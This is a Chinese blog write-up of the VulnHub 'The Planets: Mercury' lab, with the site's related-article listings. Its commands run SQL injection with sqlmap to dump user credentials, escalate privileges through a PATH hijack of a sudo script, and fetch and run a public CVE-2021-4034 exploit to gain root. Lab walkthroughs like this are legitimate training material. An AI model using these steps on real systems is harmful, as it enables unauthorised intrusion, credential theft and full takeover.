Vulnhub项目:THE PLANETS: MERCURY

最新推荐文章于 2024-06-20 13:51:15 发布
最新推荐文章于 2024-06-20 13:51:15 发布
阅读量917 收藏 9
点赞数 32
分类专栏: 渗透项目 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43938645/article/details/139416600
版权

1、靶场地址

The Planets: Mercury ~ VulnHubThe Planets: Mercury, made by SirFlash. Download & walkthrough links are available.icon-default.png?t=N7T8https://vulnhub.com/entry/the-planets-mercury,544/

这好像是个系列的,关于星球系列,之前还做过一个地球的,有兴趣的可以看看!Vulnhub项目:Earth_vulnhub earth-CSDN博客文章浏览阅读714次。Vulnhub项目:Earth_vulnhub earthhttps://blog.csdn.net/weixin_43938645/article/details/130265310?spm=1001.2014.3001.5501

2、渗透过程

搞起!确认目标 56.165,本机 56.160,nmap 探测开放端口。

开放 22 和 8080 端口,访问 8080,没啥东西,那就扫个目录看看 

只有个 robots.txt 

访问一下,啥都没有 

尝试 index.html,发现了报错提醒,有个新的路径。

 访问新路径后发现了一张图和两个链接,随便点一点观察一下。

访问 load a fact 后发现这块的 id 有东西 。

 

经过几次尝试发现这块应该有 sql 注入 。

打个单引号,果然,如下图所示

 sqlmap 启动,具体命令如下,基础操作! 

sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 --dbs --batch

sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 -D mercury --tables --batch
sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 -D mercury -T users --columns --batch

sqlmap -u http://192.168.56.165:8080/mercuryfacts/1 -D mercury -T users -C username,password --dump --batch

发现用户名和密码。用这些用户名和密码去尝试 ssh,也可以用 hydra 去爆破 ssh。 

经过测试发现只有最后一个可以登上。

进入后,首先发现了 user_flag,还发现了个文件夹,里面有提示 

这两个怎么看怎么像个用户名和密码,只不过密码是base64 加密了

那就解密下下面的用户,很好,出来了,下面去连接这个 linuxmaster 用户,当然也可以之间在 webmaster 用户那 su 一下 

找了一下,没啥东西,那就提权一下。这里有两种方式提权,首先介绍第一种,利用 sudo -l,进行环境变量提权。可以看看这个 sh 文件是怎么写的。

他这是用 tail 命令去做了个操作,那可以自己做一个 tail 二进制程序,然后把它的环境变量设置一下,应用新的环境变量,用这个环境变量下的 tail 去执行这个 sh 文件。 

echo "/bin/bash" > tail

chmod 777 tail

export PATH=.:$PATH

sudo --preserve-env=PATH /usr/bin/check_syslog.sh

啪的一下,肉特root了,获取了 root_flag。就很舒服!  

下面是第二种方式,利用 suid 去提权。输入下面的命令去找具有 suid 的文件。 

find / -perm -4000 -type f 2>/dev/null

好巧不巧,发现了个这个,我以前文章有对这个 cve 进行分析CVE-2021-4034漏洞原理解析-CSDN博客文章浏览阅读8k次,点赞5次,收藏14次。本篇文章主要分析了CVE-2021-4034漏洞,同时介绍了相关知识点以及使用方法,漏洞复现在前渗透测试(七)中体现,记录自己学习过程。_cve-2021-4034https://blog.csdn.net/weixin_43938645/article/details/127924107 下载,打包,开启 web 服务,让靶机把这个 cve 下载到靶机上,然后解压一下。

GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day

git clone到本地打包

tar -czvf CVE-2021-4034.tar.gz CVE-2021-4034

python3 -m http.server 8099

靶机linuxmaster   wget一下,解压,tar -xvf CVE-2021-4034.tar.gz

 

那下面就简单多了!!! 

进到这个文件夹下,make 一下 

生成了 cve-2021-4034,之间运行就可返回 root,提权成功!!!! 

这个 cve 用户还是挺广的,后面还有个类似的靶机,也是用这个 cve,当然还有其他的方式,正在做其他的方式提权,缓冲区溢出,搞起!

这个靶机算是用两种方式拿下了,希望各位看官继续关注后续文章,哈哈哈,请点赞!!哈哈!!

3、思路总结

接下来总结下思路,从 web 开始思路基本上差不多,用 sql 注入当做切入点,获取用户名和密码,然后进行 ssh 连接,进入系统后,去发现相关文件。进一步深入提权,两种方式,说不定还有更多方式,可以多尝试尝试,没事,靶机么,随便搞,又打不坏,大不了重装!!!

坚持每天能做两台,更新两篇文章,朴实无华的一天就这么度过了,还有不到一个月就得撤了,有点舍不得呢xd!!!!

Ays.Ie
关注
  • 32
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
8planets.app:8Planets应用程序的网站
03-10
要求安装$ git clone https://github.com/pixyzehn/8planets.app.git$ cd 8planets.app/$ bundle install建造$ bundle exec jekyll build预览$ bundle exec jekyll serve执照代码是在下开源的。 内容是根据。
Three-Planets:WebGL 项目
06-21
三颗行星 威廉和第三组的 WebGL 项目
Planets-XCL:XCL Planets Software 用于批准成功的迁移操作
07-07
行星 XCL 该软件是长期保存项目 PLANETS ( ) 的最终产品之一,该项目于 2006 年至 2010 年在几个欧洲国家的机构中运行,其中大多数是图书馆、档案馆或大学,由欧盟委员会作为 FP6 计划资助。 在此背景下,科隆大学 ...
OGL_Planets:OpenGL Planets,一个太阳系模拟。-开源
04-28
OpenGL Planets在Windows下运行。 包括完整的源代码。 它是用Delphi 7和OpenGL(DelphiGL)编写的。 在我的主页上有一个德语教程,网址为:...
flutter_planets_tutorial:Flutter Planets应用程序教程,每节课有提交
02-03
flutter_planets_tutorial:Flutter Planets应用程序教程,每节课有提交
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8295
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全网络安全威胁及途径
衍生星球的博客
06-17 142
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
网络安全攻防演练:提升应急响应能力
weixin_64392888的博客
06-14 725
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。
网络安全练气篇——OWASP TOP 10
weixin_55762309的博客
06-13 1084
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
网络安全筑基篇——SQL注入
weixin_55762309的博客
06-17 1091
SQL(Structured Query Language,结构化查询语言)是一种用于管理关系型数据库系统的语言,它可以用于创建、修改和删除数据库中的表和记录,以及执行查询操作。简单易学:SQL语法相对简单,易于理解和学习。高效灵活:SQL可以执行快速和复杂的数据库操作,如插入、更新、删除和查询。标准化:SQL是一种标准化的语言,大多数关系型数据库系统都支持SQL。表达能力强:SQL支持各种复杂的查询和数据操作,可以根据需要进行数据的筛选、排序、合并等操作。
提升网络安全韧性:从基础防护开始
Dexun_chuqi的博客
06-13 668
网络安全韧性(Cyber Resilience)指的是在面对网络攻击或其他不利事件时,系统、网络和组织能够有效抵御、吸收和恢复正常功能的能力。这一概念不仅关注防止攻击的发生,还强调在攻击发生后,系统能够迅速恢复并继续运行。网络安全韧性包括预防、响应、恢复三个主要环节,旨在确保在面对各种潜在威胁时,网络能够保持其关键功能。提升网络安全韧性是一项系统性工程,涉及多个方面的综合管理和技术手段。
【网络文明】关注网络安全
Liang_z_的博客
06-12 715
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
网络安全和信息安全
waitaikong_的博客
06-12 729
信息安全网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全网络安全的内容,还延伸到了更广泛的社会和法律层面。
网络安全网络安全基础精讲 - 网络安全入门第一篇
goldfish8848的博客
06-11 1487
网络安全基础知识
Python网络安全项目开发实战,如何防命令注入
一个好知识的传播者
06-20 550
防止命令注入是Python网络安全项目开发中的重要一环。通过用户输入验证、参数化查询、使用安全函数和库、最小权限原则、输出编码和转义、错误处理和日志记录、安全审计和监控以及安全培训和意识提升等方法,可以大大降低命令注入的风险。
网络安全复习笔记
annesede的博客
06-18 655
复习自用,仅供参考~
网络安全的神秘世界】文件上传、JBOSS、Struct漏洞复现
最新发布
weixin_54750312的博客
06-20 706
蚁剑webshell图形化,下面介绍结合蚁剑工具对tomcat的漏洞利用蚁剑百度网盘使用过程将蚁剑漏洞的shell脚本上传至服务端访问上传的shell.jsp,若网站正常响应,则上传成功,否则失败使用中国蚁剑连接粘贴刚才上传shell.jsp后的url,连接蚁剑的密码是cmd双击进入服务器,tomcat的配置就能随便翻阅了,至此已经成功shell.jsptomcat、shell、蚁剑的关系。
信息安全网络安全、网络空间安全傻傻分不清?
gmqqcsdn的博客
06-17 967
网络空间安全是一个更为广泛的概念,它不仅仅关注网络本身的安全,还涉及到网络所承载的信息、网络参与者的行为以及网络与现实世界的交互等多个方面。网络空间安全的目标是构建一个安全、可信、健康的网络环境,保障网络空间的正常运行和社会的稳定。网络安全是信息安全在网络领域的延伸,它主要关注的是保护网络系统免受各种安全威胁和攻击,确保网络服务的正常运行和数据的安全传输。随着信息技术的不断发展,网络安全问题日益突出,我们需要从多个层次出发,加强信息安全网络安全和网络空间安全的建设,共同维护网络空间的安全与稳定。
网络安全:什么是SQL注入
浪里个狼游记
06-17 484
在数字化时代,数据安全成为了企业和个人最关心的问题之一。SQL注入(SQL Injection)是网络安全领域中最常见也是最危险的攻击手段之一。本文将深入探讨SQL注入的概念、工作原理以及它如何成为一个严重的威胁。SQL注入是一种代码注入技术,攻击者通过在Web表单输入或者URL查询字符串中输入恶意SQL代码,利用应用程序后端数据库的安全漏洞,从而执行非法的数据库操作。这些操作可能包括但不限于数据泄露、数据删除、数据篡改和身份冒用。
the planets: earth靶机
04-11
问题:关于行星:地球和静机。 回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值